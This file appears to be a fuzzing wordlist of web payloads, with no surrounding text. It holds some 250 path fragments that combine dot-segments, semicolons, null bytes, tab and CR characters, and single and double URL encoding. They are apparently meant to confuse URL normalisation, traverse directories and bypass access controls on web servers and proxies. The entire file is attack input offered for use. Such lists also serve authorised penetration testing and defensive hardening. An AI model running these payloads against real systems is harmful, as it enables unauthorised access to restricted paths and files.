#
#?
..
../
..;\
..;\;
..\
..\;
/
/#
/*
/*/
/..
/../
/../../
/../../../
/../../..//
/../..//
/../..//../
/../..;/
/.././../
/../.;/../
/..//
/..//../
/..//../../
/..//..;/
/../;/
/../;/../
/..;/
/..;/../
/..;/..;/
/..;//
/..;//../
/..;//..;/
/..;/;/
/..;/;/..;/
/./
/.//
/.;/
/.;//
//
//..
//../../
//..;
//./
//.;/
///
///..
///../
///..//
///..;
///..;/
///..;//
//;/
//;//
/;
/;/
/;//
/;?
/?
/?;
;
;/..
;/../
;/../../
;/../..//
;/.././../
;/../.;/../
;/..//
;/..//../
;/..///
;/../;/
;/../;/../
;/..;
;/.;.
;//..
;//../../
;///..
;///../
;///..//
;?
?
?#
?;
??
..%00/
..%00/;
..%00;/
..;%00/
%09
%09..
%09;
..%09
;%09
;%09..
;%09..;
;%09;
%09%3b
..%0d/
..%0d/;
..%0d;/
..;%0d/
%20
/%20
/%20#
/%20%23
%23
/%23
%23%3f
/%252e/
/%252e%252e%252f/
/%252e%252e%253b/
/%252e%252f/
/%252e%253b/
%252f/
/%252f
%252f%252f
/%2e/
/%2e//
;/%2e.
;/.%2e
%2e%2e
%2e%2e/
/%2e%2e
/%2e%2e/
;/%2e%2e
;/%2e%2e/
;/..//%2e%2e/
;/.%2e/%2e%2e/%2f
/%2e%2e%2f/
;/%2e%2e%2f/
;/%2e%2e%2f%2f
/%2e%2e%3b/
/%2e%2f/
/%2e%3b/
/%2e%3b//
%2f
%2f/
%2f//
%2f;?
%2f?;
/%2f
/%2f/
/..%2f
/..;%2f
//%2f
;%2f..
;%2f..//../
;%2f..///
;%2f..///;
;%2f..//;/
;%2f..//;/;
;%2f../;//
;%2f../;/;/
;%2f../;/;/;
;%2f..;///
;%2f..;//;/
;%2f..;/;//
;%2f//../
;%2f//..;/
;%2f/;/../
;%2f/;/..;/
;%2f;//../
;%2f;/;/..;/
;/%2f/../
;/..%2f
;/..%2f/
;/..%2f//
;/../%2f/
;/..//%2f
;//%2f../
;%2F..
%2f%20%23
%2f%23
;%2f%2e%2e
;%2f%2e%2e%2f%2e%2e%2f%2f
%2f%2f
%2f/%2f
/..%2f..%2f
/..;%2f..;%2f
;%2f%2f/../
;%2f..%2f/
;%2f..%2f/../
;%2f../%2f../
;%2f..//..%2f
;%2f/%2f../
;%2f//..%2f
;/%2f%2f../
;/%2f/..%2f
;/..%2f%2f../
;/..%2f..%2f
;%2f..%2f%2e%2e%2f%2f
%2f%2f%2f
/..%2f..%2f..%2f
/..;%2f..;%2f..;%2f
;%2f..%2f/..%2f
;%2f../%2f..%2f
;%2f..%2f..%2f%2f
%2f%3b%2f
%2f%3b%2f%2f
%2f%3f
%2f%3f/
%3b
%3b/..
/%3b/
%3b%09
%3b/%2e.
%3b/%2e%2e/..%2f%2f
%3b%2f..
%3b//%2f../
%3b%2f%2e.
%3b%2f%2e%2e
%3b%2f%2e%2e%2f%2e%2e%2f%2f
%3b/%2f%2f../
%3f%23
%3f%3f
%3f.php
..%5c/
..%ff/
..%ff/;
..%ff;/
..;%ff/
.html
.json
.php
?.php
/;x
/;x/
/x/../
/x/..//
/x/../;/
/x/..;/
/x/..;//
/x/..;/;/
/x//../
/x//..;/
/x/;/../
/x/;/..;/
;x
;x/
;x;
